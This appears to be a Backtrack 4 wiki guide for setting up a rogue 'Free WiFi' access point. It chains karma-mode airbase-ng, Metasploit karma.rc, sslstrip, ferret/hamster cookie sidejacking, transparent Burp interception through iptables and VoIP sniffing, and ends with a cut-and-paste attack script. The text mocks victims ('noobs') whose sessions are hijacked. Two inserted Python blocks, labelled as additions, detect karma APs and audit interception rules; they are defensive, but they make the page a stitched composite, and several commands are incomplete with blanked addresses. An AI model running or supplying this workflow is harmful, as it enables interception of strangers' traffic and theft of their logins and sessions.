How-To: Backtrack 4 Guide

Get into Backtrack
Use my bt-customize script, not BT's.

  1. apt-get update
  2. apt-get upgrade
  3. apt-get clean

VirtualBox Guest Additions: not needed anymore with the Defcon 18 BT release.

  1. cd /usr/src/linux
  2. make-kpkg kernel_headers
  3. cd ..
  4. dpkg -i linux-headers.blah.blah.deb
  5. Steal the from the VirtualBox server directory.
  6. ./

Update Metasploit (this step is required).

$ sudo bash
cd /pentest/svn
rm -rf framework3
svn co framework3

cd /pentest/svn/framework3/external/pcaprub
ruby extconf.rb
make && make install

cd /pentest/svn
svn co lorcon2
cd lorcon2
./configure --prefix=/usr && make && make install
cd /pentest/svn/framework3/external/ruby-lorcon2
ruby extconf.rb
make && make install

Then link it back to the original location:
rm /pentest/exploits/framework3
ln -s /pentest/svn/framework3 /pentest/exploits/

To keep it all up to date:
svn update /pentest/svn/framework3/

You need this too:
gem install activerecord sqlite3-ruby

To fire up an access point

airmon-ng start [wifi-interface]
This will create a monitor interface and tell you what it is. Mine is mon0, yours may be different. Use iwconfig to see it.
aireplay-ng --test [monitor-interface] (i.e. mon0)

nano /etc/dhcp3/dhcpd.conf
default-lease-time 60;
max-lease-time 72;

ddns-update-style none;


log-facility local7;

subnet netmask {
option routers;
option domain-name-servers;
}

nano /etc/default/dhcp3-server
change the interface to "at0" (not ethX or wlanX).

To catch every probe request (karma mode, answering whatever SSID a client asks for):
airbase-ng -P [monitor-interface] -v
or to advertise a particular network:
airbase-ng -P -C 30 -e "Free WiFi" [monitor-interface] (i.e. mon0) -v or -q
Now, when airbase fires up, it creates at0. This at0 is what you use for IP traffic, not wlanX, not ethX…
ifconfig at0 up netmask

You should now have a running access point. You can now set up IP masquerading to hand out net access, or get on with the more fun stuff below.
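The -P (karma) behaviour above is also what gives a rogue AP away: one BSSID sending probe responses for lots of different SSIDs it never beacons. The following detection check is an added example, not part of the original guide; the frame records are constructed, standing in for what a monitor-mode capture would feed in.

```python
from collections import defaultdict

# Constructed sample of parsed 802.11 management frames: (subtype, bssid, ssid).
# The second BSSID behaves like airbase-ng -P, answering every name it hears.
SAMPLE_FRAMES = [
    ("probe_resp", "00:11:22:33:44:55", "HomeNet"),
    ("probe_resp", "00:11:22:33:44:55", "HomeNet"),
    ("beacon",     "00:11:22:33:44:55", "HomeNet"),
    ("probe_resp", "aa:bb:cc:dd:ee:ff", "linksys"),
    ("probe_resp", "aa:bb:cc:dd:ee:ff", "attwifi"),
    ("probe_resp", "aa:bb:cc:dd:ee:ff", "CoffeeShop"),
    ("probe_resp", "aa:bb:cc:dd:ee:ff", "Free WiFi"),
    ("beacon",     "aa:bb:cc:dd:ee:ff", "Free WiFi"),
]

def ssids_per_bssid(frames):
    """Map each BSSID to the set of SSIDs it has claimed in probe responses."""
    seen = defaultdict(set)
    for subtype, bssid, ssid in frames:
        if subtype == "probe_resp":
            seen[bssid.lower()].add(ssid)
    return seen

def beacon_ssids(frames):
    """Map each BSSID to the SSIDs it actually advertises in beacons."""
    adv = defaultdict(set)
    for subtype, bssid, ssid in frames:
        if subtype == "beacon":
            adv[bssid.lower()].add(ssid)
    return adv

def find_karma_aps(frames, threshold=3):
    """Return BSSIDs that answered probes for at least `threshold` distinct SSIDs
    beyond the ones they beacon. A normal AP only answers for networks it
    advertises; answering every probed name is the karma signature."""
    responses, beacons = ssids_per_bssid(frames), beacon_ssids(frames)
    return sorted(b for b, s in responses.items()
                  if len(s - beacons.get(b, set())) >= threshold)

if __name__ == "__main__":
    for bssid in find_karma_aps(SAMPLE_FRAMES):
        names = sorted(ssids_per_bssid(SAMPLE_FRAMES)[bssid])
        print("possible karma AP %s answered for: %s" % (bssid, ", ".join(names)))
```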

get karma.rc

  1. wget

Metasploit auto attack framework:

  1. msfconsole -r karma.rc

You need this to keep their shit on your network (not rerouted around you) and to hand out net access:
echo 1 > /proc/sys/net/ipv4/ip_forward
### Don't do this, it fucks up DNS (a REDIRECT with no -p/--dport match diverts everything, DNS included): iptables -t nat -A PREROUTING -i at0 -j REDIRECT
iptables -t nat -A POSTROUTING -o $wan -s -j MASQUERADE

Session Sidejacking HTTP/HTTPS:

Update your sslstrip

  1. wget
  2. tar zxvf sslstrip-0.7.tar.gz
  3. cd sslstrip-0.7
  4. python setup.py install
  5. cd ..
  6. rm -rf sslstrip-0.7*

Watches for HTTPS and strips it down to HTTP: -p logs only SSL POSTs, -k kills off existing sessions, -f fakes a "lock" favicon in their browser, and it listens on port 10000 by default.
sslstrip -p -k -f
Reroute shit into sslstrip:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

Sniff session cookies
/pentest/sniffers/hamster/ferret -i at0 (or the ethX of the outgoing interface)

Monitor cookie eating

Set up your browser to proxy to and you'll see hamster's interface.
Click on noobs and then on the left you can see their sessions.

Burpsuite 1.3
First set up your firewall to transparently proxy 80 and 443 into Burp.

HTTPS Burp Proxy
($honey should be your WLAN interface, probably at0)
$ipt -t nat -A PREROUTING -i $honey -p tcp --dport 443 -j DNAT --to

HTTP Burp Proxy
$ipt -t nat -A PREROUTING -i $honey -p tcp --dport 80 -j DNAT --to
( is the IP of the WLAN interface)
The lines below are only needed if you are running a NAT firewall (allow just the two Burp listeners and DNS on the honey interface, drop the rest):
$ipt -A INPUT -i $honey -p tcp --dport 8080 -j ACCEPT
$ipt -A OUTPUT -o $honey -p tcp --sport 8080 -j ACCEPT
$ipt -A INPUT -i $honey -p tcp --dport 8181 -j ACCEPT
$ipt -A OUTPUT -o $honey -p tcp --sport 8181 -j ACCEPT
$ipt -A INPUT -i $honey -p udp --dport 53 -j ACCEPT
$ipt -A OUTPUT -o $honey -p udp --sport 53 -j ACCEPT
$ipt -A INPUT -i $honey -j DROP
$ipt -A OUTPUT -o $honey -j DROP
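Whether it is the Burp DNAT rules here, the sslstrip REDIRECT, or the catch-all REDIRECT warned about earlier, every transparent intercept shows up as a nat-table DNAT/REDIRECT rule in `iptables-save`. The audit below is an added example (not part of the original guide) that a gateway owner can run over that output to list exactly which ports are being diverted and to flag the over-broad form that also swallows DNS; the iptables-save excerpt, addresses and proxy ports are constructed.

```python
import shlex

# Constructed iptables-save excerpt; addresses and proxy ports are made up.
SAMPLE_RULES = """\
*nat
-A PREROUTING -i at0 -p tcp -m tcp --dport 443 -j DNAT --to-destination 10.0.0.1:8181
-A PREROUTING -i at0 -p tcp -m tcp --dport 80 -j DNAT --to-destination 10.0.0.1:8080
-A PREROUTING -i at0 -j REDIRECT
-A POSTROUTING -o eth0 -s 10.0.0.0/24 -j MASQUERADE
COMMIT
*filter
-A INPUT -i at0 -p tcp -m tcp --dport 8080 -j ACCEPT
COMMIT
"""

def parse_rules(text):
    """Yield (table, chain, opts) for each -A rule; opts maps flag -> value or True."""
    table = None
    for line in text.splitlines():
        if line.startswith("*"):
            table = line[1:].strip()
        elif line.startswith("-A "):
            toks = shlex.split(line)
            opts, i = {}, 2
            while i < len(toks):
                if i + 1 < len(toks) and not toks[i + 1].startswith("-"):
                    opts[toks[i]] = toks[i + 1]  # flag with a value
                    i += 2
                else:
                    opts[toks[i]] = True  # bare flag
                    i += 1
            yield table, toks[1], opts

def find_interception(text):
    """List (chain, target, scope, destination) for every nat DNAT/REDIRECT rule;
    scope is 'all traffic' when no protocol/port is matched (the form that also diverts DNS)."""
    findings = []
    for table, chain, o in parse_rules(text):
        target = o.get("-j")
        if table != "nat" or target not in ("DNAT", "REDIRECT"):
            continue
        port = o.get("--dport") or o.get("--destination-port")
        proto = o.get("-p")
        scope = "%s/%s" % (proto or "any", port or "any") if (proto or port) else "all traffic"
        dest = o.get("--to-destination") or o.get("--to-ports") or "local"
        findings.append((chain, target, scope, dest))
    return findings

if __name__ == "__main__":
    print(*find_interception(SAMPLE_RULES), sep="\n")
```

On a live box, feed it `iptables-save` output instead of SAMPLE_RULES; the filter-table ACCEPT rule is deliberately ignored because it does not divert anything.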

Forward IP

  1. echo "1" > /proc/sys/net/ipv4/ip_forward

Masquerade out
$ipt -t nat -A POSTROUTING -o $wan -s -j MASQUERADE
Fire up Burp
java -Xmx512m -jar /pentest/burpsuite_v1.3/burpsuite_v1.3.03.jar
Proxy tab->Intercept tab->Turn Intercept off.
Proxy tab->Options tab->delete current listener port.
…then add 8181 and 8080.
…Uncheck listen on loopback port
…check support invisible proxying

Xplico 0.5.6
/etc/init.d/apache2 start
/etc/init.d/xplico start
Now surf to localhost:9876
Remember, the Backtrack apache2 listens on ports 80 and 9876. The NMS LAMPP webserver listens on port 81.
You must turn on LAMPP FIRST, then apache2, as LAMPP bitches about another webserver running.

Edit /etc/silcd/silcd-primary-ip.conf with the IP you want to listen on.

  1. /etc/init.d/silcd start

Pidgin with Silcd
Fire up Pidgin.
Add a new account.
Basic tab -> enter your nick, the IP of the silcd server and your password.
Advanced tab -> enter the IP of the silcd server as the connect server, check "use perfect forward secrecy" and "public key auth".
Hit Save.
You should auto-connect; it will ask for your password. If not, simply disable/re-enable your account to connect.
Then click Buddies -> Join a chat -> enter a room name to create, and an optional password for it.

Ucsniff VOIP sniffer
Will decode most codecs etc.
ucsniff -i eth0 -M

Do-it-all script, cut and paste (assumes WiFi on wlan0, WAN on eth0 and online):

airmon-ng start wlan0
airbase-ng -P mon0 -v

In another terminal:

ifconfig at0 up netmask
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o eth0 -s -j MASQUERADE
/etc/init.d/dhcp3-server start
/sbin/iptables -t nat -A PREROUTING -i at0 -p tcp --dport 443 -j DNAT --to
/sbin/iptables -t nat -A PREROUTING -i at0 -p tcp --dport 80 -j DNAT --to
java -Xmx512m -jar /pentest/burpsuite_v1.3/burpsuite_v1.3.03.jar

Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-NonCommercial-ShareAlike 3.0 License